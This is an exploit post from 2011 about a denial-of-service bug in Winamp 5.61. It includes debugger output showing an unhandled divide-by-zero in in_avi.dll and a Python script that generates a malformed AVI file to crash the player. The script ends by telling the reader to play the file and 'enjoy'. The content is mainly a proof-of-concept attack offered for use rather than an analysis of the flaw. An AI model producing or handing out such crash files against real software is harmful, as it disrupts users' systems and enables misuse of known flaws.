
Winamp 5.61 Denial Of Service

Posted on 31 March 2011

# done by BraniX <branix@hackers.org.pl> # www.hackers.org.pl # found: 2011.03.27 # published: 2011.03.29 # tested on: Windows XP SP3 Home Edition # tested on: Windows XP SP3 Professional Edition # App: Winamp 5.61 # App Url: http://www.winamp.com # in_avi.dll MD5: b8cf29733b11cb79fe47cde5127f8b70 # winamp.exe MD5: 7b78fb6a050df1739e69b2df4d93b4ab # Exception in module in_avi_.dll # Memory map, item 772 # Address=07591000 # Size=00008000 (32768.) # Owner=in_avi_1 07590000 # Section=.text # Contains=code # Type=Imag 01001002 # Access=R E # Initial access=RWE # 075988DA 8B4C24 14 MOV ECX,DWORD PTR SS:[ESP+14] ; ECX = 0 # 075988DE 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10] ; EAX = 0 # 075988E2 33D2 XOR EDX,EDX ; EDX = 0 # 075988E4 F7F1 DIV ECX ; Integer division by zero, exception is not handled filepath = "C:\Winamp 5.61 - AVI DoS.avi" f = open(filepath, "wb") poc = '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 f.write(poc) f.close() print "Done, 1 file generated on 'C:\' ..." print "Play this file with Winamp 5.61 and enjoy ;)"

 
